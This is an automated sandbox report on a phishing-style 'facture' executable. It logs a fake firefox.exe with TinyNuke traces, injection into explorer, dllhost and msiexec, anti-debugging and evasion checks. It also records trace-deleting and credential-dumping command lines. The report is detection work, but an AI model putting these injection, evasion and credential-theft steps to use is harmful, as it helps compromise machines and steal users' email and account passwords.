Source: classification engine | Classification label: mal100.evad.phis.spyw.troj.winEXE@17/110@2/1
Contains functionality for error logging
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004328A4 GetLastError,FormatMessageW
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_0040E538 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_1_0040E538 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004B00AC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_1_004B00AC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Contains functionality to check free disk space
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_0040805C GetDiskFreeSpaceW
Contains functionality to instantiate COM classes
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004CC238 GetVersion,CoCreateInstance
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\facture_1398665.exe | Code function: 2_2_0040EE14 FindResourceW,SizeofResource,LoadResource,LockResource
Creates files inside the user directory
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | File created: C:\Users\user\AppData\Local\Programs
Creates temporary files
Source: C:\Users\user\Desktop\facture_1398665.exe | File created: C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp
Found command line output
Source: C:\Windows\System32\cmd.exe | Console Write: .........'.@......... ....'.l.'.E..J.........'.@....@F.J. ....'.......>.V..J..>.......>...'.......Fu....t...`.....,.....
Parts of this application use Borland Delphi (probably coded in Delphi)
Source: C:\Users\user\Desktop\facture_1398665.exe | Key opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Key opened: HKEY_USERS\Software\Borland\Delphi\Locales
Queries a list of all open handles
Source: C:\Windows\System32\msiexec.exe | System information queried: HandleInformation
Reads ini files
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\facture_1398665.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the Windows registered organization settings
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\facture_1398665.exe 'C:\Users\user\Desktop\facture_1398665.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp 'C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp' /SL5='$7016C,1728489,170496,C:\Users\user\Desktop\facture_1398665.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe 'C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe'
Source: unknown | Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c del /f /q %temp%\gif*
Source: unknown | Process created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE740.tmp'
Source: unknown | Process created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp'
Source: C:\Users\user\Desktop\facture_1398665.exe | Process created: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp 'C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp' /SL5='$7016C,1728489,170496,C:\Users\user\Desktop\facture_1398665.exe'
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Process created: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Process created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exe
Source: C:\Windows\System32\dllhost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c del /f /q %temp%\gif*
Source: C:\Windows\System32\dllhost.exe | Process created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp'
Source: C:\Windows\System32\dllhost.exe | Process created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE740.tmp'
Uses an in-process (OLE) Automation server
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Reads the Windows registered owner settings
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Executable creates window controls seldom found in malware
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Window found: window name: TMainForm
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Submission file is bigger than most known malware samples
Source: facture_1398665.exe | Static file information: File size 2153784 > 1048576
Uses new MSVCR DLLs
Source: C:\Windows\explorer.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: facture_1398665.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: api-ms-win-core-console-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source: Binary string: C:\Users\user\Desktop\Project\TinyNuke\Bin\Bot.pdb source: firefox.exe
Source: Binary string: C:\Users\user\Desktop\Project\TinyNuke\Bin\int32.pdb source: firefox.exe, 00000006.00000002.12877277547.0039D000.00000004.sdmp, dllhost.exe, 00000008.00000000.12873746576.000A0000.00000040.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL< source: firefox.exe, 00000004.00000002.12835662456.00B20000.00000004.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: firefox.exe, api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-time-l1-1-0.dll.4.dr
Source: Binary string: ucrtbase.pdbUGP source: is-6FJQD.tmp.3.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: api-ms-win-core-errorhandling-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdb source: firefox.exe, is-8PSLE.tmp.3.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-string-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: firefox.exe, api-ms-win-core-file-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: firefox.exe, api-ms-win-core-synch-l1-2-0.dll.4.dr
Source: Binary string: ucrtbase.pdb source: firefox.exe, is-6FJQD.tmp.3.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: firefox.exe, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: is-599GA.tmp.3.dr
Source: Binary string: msvcr110.i386.pdb source: is-5UL7D.tmp.3.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: dllhost.exe, 00000008.00000002.13107360851.01670000.00000004.sdmp
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-math-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: firefox.exe, is-437NP.tmp.3.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: firefox.exe, api-ms-win-core-localization-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\browser\app\firefox.pdb source: firefox.exe, 00000004.00000000.12816996658.01376000.00000002.sdmp, firefox.exe, 00000005.00000000.12824767482.00FC6000.00000002.sdmp, firefox.exe, 00000006.00000000.12824745977.00FC6000.00000002.sdmp, firefox.exe.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb-- source: is-599GA.tmp.3.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: api-ms-win-core-debug-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: firefox.exe, api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: is-437NP.tmp.3.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: is-8PSLE.tmp.3.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: api-ms-win-core-datetime-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: firefox.exe, api-ms-win-core-timezone-l1-1-0.dll.4.dr

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: A0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 50000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory allocated: C:\Windows\explorer.exe base: 5330000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory allocated: C:\Windows\explorer.exe base: 1EB0000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory allocated: C:\Windows\System32\msiexec.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory allocated: C:\Windows\System32\msiexec.exe base: 400000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 5330000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 5330000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 5331000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 5331000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 5348000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 5348000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 5351000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 5351000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 53B6000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 53B6000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 53B7000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 53B7000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 1EB0000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 1EB0000 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 1EB0020 protect: page execute and read and write
Source: C:\Windows\System32\dllhost.exe | Memory protected: C:\Windows\explorer.exe base: 1EB0000 protect: page execute and read and write
Contains functionality to inject threads in other processes
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 6_2_00382712 VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WriteProcessMemory,WriteProcessMemory,GetVersionExA,CreateRemoteThread,RtlCreateUserThread
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\explorer.exe EIP: 1EB0020
Injects a PE file into foreign processes
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Memory written: C:\Windows\System32\dllhost.exe base: A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 5330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 400000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 1376 base: 5330000 value: 4D
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 1376 base: 5331000 value: 55
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 1376 base: 5348000 value: 70
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 1376 base: 5351000 value: F6
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 1376 base: 53B6000 value: 00
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 1376 base: 53B7000 value: 00
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 1376 base: 1EB0000 value: 00
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 1376 base: 1EB0020 value: 55
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\dllhost.exe | Thread register set: target process: 1916
Source: C:\Windows\System32\dllhost.exe | Thread register set: target process: 2224
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Memory written: C:\Windows\System32\dllhost.exe base: A0000
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Memory written: C:\Windows\System32\dllhost.exe base: A1000
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Memory written: C:\Windows\System32\dllhost.exe base: B8000
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Memory written: C:\Windows\System32\dllhost.exe base: C1000
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Memory written: C:\Windows\System32\dllhost.exe base: 126000
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Memory written: C:\Windows\System32\dllhost.exe base: 127000
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Memory written: C:\Windows\System32\dllhost.exe base: 50000
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Memory written: C:\Windows\System32\dllhost.exe base: 50020
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 5330000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 5331000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 5348000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 5351000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 53B6000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 53B7000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 1EB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 1EB0020
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 400000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 401000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 445000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 400000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 451000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 401000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 454000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 413000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 417000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 7FFD9008
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 419000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\msiexec.exe base: 7FFD8008
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004D8F68 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\facture_1398665.exe | Process created: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp 'C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp' /SL5='$7016C,1728489,170496,C:\Users\user\Desktop\facture_1398665.exe'
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Process created: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Process created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exe
Source: C:\Windows\System32\dllhost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c del /f /q %temp%\gif*
Source: C:\Windows\System32\dllhost.exe | Process created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp'
Source: C:\Windows\System32\dllhost.exe | Process created: C:\Windows\System32\msiexec.exe '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE740.tmp'
Contains functionality to add an ACL to a security descriptor
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_00480E38 InitializeSecurityDescriptor,SetSecurityDescriptorDacl
Contains functionality to create a new security descriptor
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004B8A78 GetVersion,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,AllocateAndInitializeSid,GetLastError,LocalFree
May try to detect the Windows Explorer process (often used for injection)
Source: dllhost.exe, 00000008.00000002.13106432822.005C0000.00000002.sdmp | Binary or memory string: Progman
Source: firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp | Binary or memory string: Shell_TrayWnd*
Source: dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmp | Binary or memory string: Shell_TrayWnd[
Source: dllhost.exe, 00000008.00000002.13106432822.005C0000.00000002.sdmp | Binary or memory string: Program Manager
Source: firefox.exe, 00000004.00000002.12835662456.00B20000.00000004.sdmp, firefox.exe, 00000006.00000002.12879649887.00CE0000.00000004.sdmp, dllhost.exe, 00000008.00000002.13106018989.00193000.00000004.sdmp | Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | File opened: C:\Windows\WinSxS\FileMaps\users_user_1_appdata_local_temp_is-7i2ss.tmp_1f55c2dc497036d9.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | System information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_01356B21 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 6_2_00389812 RtlEncodePointer,RtlEncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_697FE6B0 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | Code function: 3_2_004A1A3C LoadLibraryExW,LoadLibraryW,GetProcAddress
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_69779678 mov eax, dword ptr fs:[00000030h]
Contains functionality to register its own exception handler
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_01356C80 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_01356B21 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_01356810 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E0C8D65 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E0D644D _crt_debugger_hook,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | Code function: 4_2_6E0D52D5 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_00FA6C80 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_00FA6810 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_00FA6B21 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_69788DA0 __report_gsfailure,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 5_2_697952D5 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Code function: 6_2_00386A66 SetUnhandledExceptionFilter,UnhandledExceptionFilter

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Checks the free space of harddrives
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File Volume queried: C:\ FullSizeInformation
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\dllhost.exe | Thread delayed: delay time: 1800000
